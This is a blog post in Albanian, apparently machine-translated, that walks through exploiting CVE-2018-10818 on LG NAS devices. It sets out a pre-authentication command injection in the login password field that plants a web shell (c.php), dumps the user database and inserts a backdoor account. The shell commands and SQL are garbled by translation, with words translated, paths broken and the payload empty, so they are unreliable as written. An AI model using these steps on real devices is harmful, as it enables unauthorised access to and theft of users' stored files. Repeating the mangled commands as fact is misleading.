Dobësia kritike që gjendet në shumicën e pajisjeve LG NAS

Përmbledhje:

Ne kemi kryer një vlerësim gjithëpërfshirës në një pajisje LG NAS. Kjo pajisje është një pajisje ruajtëse e lidhur me një rrjet që lejon vetëm përdoruesit e autorizuar. Duket si një re private, vetëm kushton më pak, është e thjeshtë për tu operuar dhe ju jep kontroll të plotë. megjithatë, ne gjetëm një mënyrë për të hudhur në sistem duke përdorur një prekshmëri të vërtetuar të injektimit të komandës në distancë (CVE-2018-10818), e cila më pas mund të na lejojë të bëjmë pothuajse gjithçka, duke përfshirë hyrjen në të dhëna dhe ngatërrime me të dhënat e përdoruesit dhe përmbajtjen. 

shfrytëzimi:

Dobësia (CVE-2018-10818) është një ndjeshmëri para-auth e largimit të injektimit të komandës që gjendet në shumicën e pajisjeve LG NAS.

Siç e tregojmë në video, nuk mund thjesht të identifikohesh me ndonjë emër përdoruesi dhe fjalëkalim. Sidoqoftë, ekziston një prekshmëri e injektimit të komandës në parametrin “fjalëkalimi” (duhet të përdorni një interceptues si burp). Ne thjesht mund të shkaktojmë këtë bug duke e shtuar atë. Për të shtuar një përdorues të ri, thjesht mund të shkruajmë një guaskë të vazhdueshme të quajtur c.php duke përdorur:
; jehonë “” > / tmp / x2; sudo mv / tmp / x2 /var/www/c.php
Futja e tij si fjalëkalim shfrytëzon cenueshmërinë.

Pastaj, duke kaluar komandën e mëposhtme, ne mund t’i “hedhim” përdoruesit:
jehonë “. përdoruesi hedh” | sqlite3 /etc/nas/db/share.db
Dumping do të thotë të lexosh të gjitha të dhënat e bazës së të dhënave. Ne hedhim bazën e të dhënave për të parë emrat e përdoruesve dhe fjalëkalimet. Kjo gjithashtu na lejon të shtojmë tonat.

Për të shtuar një përdorues të ri në bazën e të dhënave, duhet të gjenerojmë një MD5 të vlefshëm. Ne mund të përdorim mjetin MD5 të përfshirë për të krijuar një hash me emrin “test” dhe fjalëkalimin “1234”.
sudo nas-zakonshëm md5 1234
Pasi të kemi një fjalëkalim të vlefshëm dhe emrin e përdoruesit, mund ta shtojmë në bazën e të dhënave me sa vijon:
INSERT NO “përdorues” VLERAT (“test”, “md5_hash”, “Vuln Test”, “test @ localhost”, “);
Pasi të përfundojë kjo, ne mund të futemi në Ruajtjen e Rrjetit LG me testin e emrit të përdoruesit dhe fjalëkalimin 1234.

Kjo na jep mundësinë e përdorimit të sistemit si një përdorues i autorizuar. Nga këtu ne mund të qasemi në të gjitha të dhënat ose skedarët e klasifikuar që janë ruajtur në pajisjen LAS.

rekomandime:

  • Jini të vetëdijshëm që pajisjet LAS mund të hackohen dhe shfrytëzohen.
  • Kontaktoni LG dhe njoftoni ata rreth kësaj dobësie dhe kërkoni që ata ta rregullojnë atë.
  • Paralajmëroni miqtë tuaj në facebook (këtu është një lidhje), ose eksitim (klikoni për të cicëruar)
Kim Martin
Kim Martin Administrator
Sorry! The Author has not filled his profile.
follow me